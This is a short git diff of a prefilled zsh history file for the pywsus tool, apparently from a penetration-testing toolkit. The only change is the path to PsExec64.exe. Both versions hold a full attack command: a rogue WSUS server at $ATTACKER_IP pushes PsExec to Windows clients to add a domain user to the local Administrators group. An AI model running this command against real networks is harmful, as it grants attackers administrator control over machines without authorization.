diff --git a/sources/zsh/history.d/pywsus b/sources/zsh/history.d/pywsus index 81ae2c09a..b0c59b4c9 100644 --- a/sources/zsh/history.d/pywsus +++ b/sources/zsh/history.d/pywsus @@ -1 +1 @@ -pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"' +pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/SysinternalsSuite/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'